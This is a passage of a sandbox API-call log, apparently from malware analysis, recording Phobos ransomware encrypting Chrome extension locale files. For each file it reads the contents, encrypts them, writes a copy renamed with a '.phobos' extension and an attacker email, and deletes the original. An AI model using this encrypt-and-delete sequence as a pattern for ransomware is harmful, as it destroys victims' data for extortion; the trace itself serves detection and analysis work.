CloseHandle (hObject=0x134) returned 1 [0151.262] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json")) returned 1 [0151.263] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.263] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=257) returned 1 [0151.264] CloseHandle (hObject=0x134) returned 1 [0151.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json")) returned 0x2020 [0151.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.264] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.264] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x101, lpOverlapped=0x0) returned 1 [0151.265] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.265] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.266] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.266] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.266] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.266] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.266] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.266] CloseHandle (hObject=0x134) returned 1 [0151.266] CloseHandle (hObject=0x138) returned 1 [0151.267] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json")) returned 1 [0151.267] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.268] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=246) returned 1 [0151.268] CloseHandle (hObject=0x138) returned 1 [0151.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0151.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.268] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.268] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.268] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.269] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf6, lpOverlapped=0x0) returned 1 [0151.269] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.269] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.270] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.270] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.270] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.270] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.270] CloseHandle (hObject=0x138) returned 1 [0151.270] CloseHandle (hObject=0x134) returned 1 [0151.271] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json")) returned 1 [0151.271] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.272] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=264) returned 1 [0151.272] CloseHandle (hObject=0x134) returned 1 [0151.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0151.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.272] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.272] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.272] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.272] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.273] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x108, lpOverlapped=0x0) returned 1 [0151.273] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.273] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.274] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.274] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.274] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.274] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.275] CloseHandle (hObject=0x134) returned 1 [0151.275] CloseHandle (hObject=0x138) returned 1 [0151.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json")) returned 1 [0151.276] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.276] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=281) returned 1 [0151.276] CloseHandle (hObject=0x138) returned 1 [0151.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json")) returned 0x2020 [0151.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.276] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.276] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.277] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.277] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.277] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x119, lpOverlapped=0x0) returned 1 [0151.278] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.278] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.279] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.279] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.279] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.279] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.279] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.279] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.279] CloseHandle (hObject=0x138) returned 1 [0151.279] CloseHandle (hObject=0x134) returned 1 [0151.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json")) returned 1 [0151.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.281] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=338) returned 1 [0151.281] CloseHandle (hObject=0x134) returned 1 [0151.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json")) returned 0x2020 [0151.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 